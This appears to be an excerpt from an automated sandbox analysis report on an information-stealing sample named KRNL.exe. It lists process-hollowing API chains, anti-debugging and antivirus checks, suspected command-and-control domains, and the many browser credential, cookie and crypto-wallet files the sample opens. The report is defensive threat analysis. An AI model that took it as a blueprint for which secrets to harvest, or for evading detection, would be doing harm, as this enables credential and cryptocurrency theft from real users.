                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 0_2_00701FE9 FindFirstFileExW,FindNextFileW,FindClose,FindClose
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_00701F38 FindFirstFileExW
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_00701FE9 FindFirstFileExW,FindNextFileW,FindClose,FindClose
                    Source: C:\Users\user\Desktop\KRNL.exe | File opened: C:\Users\user\AppData\Local\PlaceholderTileLogoFolder
                    Source: C:\Users\user\Desktop\KRNL.exe | File opened: C:\Users\user\AppData\Local\Packages
                    Source: C:\Users\user\Desktop\KRNL.exe | File opened: C:\Users\user\AppData\Local
                    Source: C:\Users\user\Desktop\KRNL.exe | File opened: C:\Users\user\AppData\Local\Mozilla
                    Source: C:\Users\user\Desktop\KRNL.exe | File opened: C:\Users\user\AppData\Local\PeerDistRepub
                    Source: C:\Users\user\Desktop\KRNL.exe | File opened: C:\Users\user\.ms-ad
                    Source: KRNL.exe, 00000002.00000003.1976890658.0000000003383000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1751999595.0000000003383000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699717842.0000000003383000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1765441778.0000000003383000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1976367913.0000000003383000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1710350446.0000000003383000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000002.2915821353.0000000003383000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1821869308.0000000003383000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000002.2915718328.000000000332C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                    Source: C:\Users\user\Desktop\KRNL.exe | API call chain: ExitProcess graph end node graph_2-33932
                    Source: C:\Users\user\Desktop\KRNL.exe | Process information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_0043CD20 LdrInitializeThunk
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 0_2_006EF8E9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 0_2_0071A19E mov edi, dword ptr fs:[00000030h]
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 0_2_006E1FB0 mov edi, dword ptr fs:[00000030h]
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 2_2_006E1FB0 mov edi, dword ptr fs:[00000030h]
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 0_2_006FD8E0 GetProcessHeap
                    Source: C:\Users\user\Desktop\KRNL.exe | Code function: 0_2_006EF52D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 0_2_006EF8E9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_006EF8E9
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 0_2_006EF8DD SetUnhandledExceptionFilter,0_2_006EF8DD
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 0_2_006F7E30 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_006F7E30
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_006EF52D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_006EF52D
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_006EF8E9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_006EF8E9
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_006EF8DD SetUnhandledExceptionFilter,2_2_006EF8DD
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_006F7E30 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_006F7E30

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Users\user\Desktop\KRNL.exe Code function: 0_2_0071A19E GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread, 0_2_0071A19E
                    Source: C:\Users\user\Desktop\KRNL.exe Memory written: C:\Users\user\Desktop\KRNL.exe base: 400000 value starts with: 4D5A
                    Source: KRNL.exe, 00000000.00000002.1676084823.00000000043BD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: hummskitnj.buzz
                    Source: KRNL.exe, 00000000.00000002.1676084823.00000000043BD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: cashfuzysao.buzz
                    Source: KRNL.exe, 00000000.00000002.1676084823.00000000043BD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: appliacnesot.buzz
                    Source: KRNL.exe, 00000000.00000002.1676084823.00000000043BD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: screwamusresz.buzz
                    Source: KRNL.exe, 00000000.00000002.1676084823.00000000043BD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: inherineau.buzz
                    Source: KRNL.exe, 00000000.00000002.1676084823.00000000043BD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: scentniej.buzz
                    Source: KRNL.exe, 00000000.00000002.1676084823.00000000043BD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: rebuildeso.buzz
                    Source: KRNL.exe, 00000000.00000002.1676084823.00000000043BD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: prisonyfork.buzz
                    Source: KRNL.exe, 00000000.00000002.1676084823.00000000043BD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: mindhandru.buzz
                    Source: C:\Users\user\Desktop\KRNL.exe Process created: C:\Users\user\Desktop\KRNL.exe "C:\Users\user\Desktop\KRNL.exe"
                    Source: C:\Users\user\Desktop\KRNL.exe Code function: EnumSystemLocalesW, 0_2_006FD1BD
                    Source: C:\Users\user\Desktop\KRNL.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 0_2_00701287
                    Source: C:\Users\user\Desktop\KRNL.exe Code function: EnumSystemLocalesW, 0_2_007014D8
                    Source: C:\Users\user\Desktop\KRNL.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 0_2_00701580
                    Source: C:\Users\user\Desktop\KRNL.exe Code function: EnumSystemLocalesW, 0_2_007017D3
                    Source: C:\Users\user\Desktop\KRNL.exe Code function: GetLocaleInfoW, 0_2_00701840
                    Source: C:\Users\user\Desktop\KRNL.exe Code function: GetLocaleInfoW, 0_2_00701960
                    Source: C:\Users\user\Desktop\KRNL.exe Code function: EnumSystemLocalesW, 0_2_00701915
                    Source: C:\Users\user\Desktop\KRNL.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 0_2_00701A07
                    Source: C:\Users\user\Desktop\KRNL.exe Code function: GetLocaleInfoW, 0_2_00701B0D
                    Source: C:\Users\user\Desktop\KRNL.exe Code function: GetLocaleInfoW, 0_2_006FCC15
                    Source: C:\Users\user\Desktop\KRNL.exe Code function: EnumSystemLocalesW, 2_2_006FD1BD
                    Source: C:\Users\user\Desktop\KRNL.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 2_2_00701287
                    Source: C:\Users\user\Desktop\KRNL.exe Code function: EnumSystemLocalesW, 2_2_007014D8
                    Source: C:\Users\user\Desktop\KRNL.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 2_2_00701580
                    Source: C:\Users\user\Desktop\KRNL.exe Code function: EnumSystemLocalesW, 2_2_007017D3
                    Source: C:\Users\user\Desktop\KRNL.exe Code function: GetLocaleInfoW, 2_2_00701840
                    Source: C:\Users\user\Desktop\KRNL.exe Code function: GetLocaleInfoW, 2_2_00701960
                    Source: C:\Users\user\Desktop\KRNL.exe Code function: EnumSystemLocalesW, 2_2_00701915
                    Source: C:\Users\user\Desktop\KRNL.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 2_2_00701A07
                    Source: C:\Users\user\Desktop\KRNL.exe Code function: GetLocaleInfoW, 2_2_00701B0D
                    Source: C:\Users\user\Desktop\KRNL.exe Code function: GetLocaleInfoW, 2_2_006FCC15
                    Source: C:\Users\user\Desktop\KRNL.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\Desktop\KRNL.exe Code function: 0_2_006F00B4 GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,GetSystemTimeAsFileTime, 0_2_006F00B4
                    Source: C:\Users\user\Desktop\KRNL.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                    Source: KRNL.exe, 00000002.00000003.1976890658.0000000003383000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1765217238.0000000003342000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1765441778.0000000003383000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1976367913.0000000003383000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000002.2915821353.0000000003383000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1821869308.0000000003383000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: C:\Users\user\Desktop\KRNL.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                    Stealing of Sensitive Information

                    Source: Yara match File source: Process Memory Space: KRNL.exe PID: 2120, type: MEMORYSTR
                    Source: Yara match File source: 2.2.KRNL.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 2.2.KRNL.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000000.00000002.1676084823.00000000043BD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: sslproxydump.pcap, type: PCAP
                    Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
                    Source: KRNL.exe, 00000002.00000003.1751999595.0000000003383000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/Electrum
                    Source: KRNL.exe, 00000002.00000003.1751999595.0000000003383000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/ElectronCash
                    Source: KRNL.exe, 00000002.00000003.1751999595.0000000003383000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
                    Source: KRNL.exe, 00000002.00000003.1751999595.0000000003383000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/JAXX New Version
                    Source: KRNL.exe, 00000002.00000003.1751999595.0000000003383000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Exodus\exodus.wallet
                    Source: KRNL.exe, 00000002.00000003.1765127023.00000000033CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ExodusWeb3
                    Source: KRNL.exe, 00000002.00000003.1751999595.0000000003383000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Ethereum
                    Source: KRNL.exe, 00000002.00000003.1765127023.00000000033CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsl
                    Source: KRNL.exe, 00000002.00000003.1751999595.0000000003383000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 0}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":["*"]
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflа
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                    Source: C:\Users\user\Desktop\KRNL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
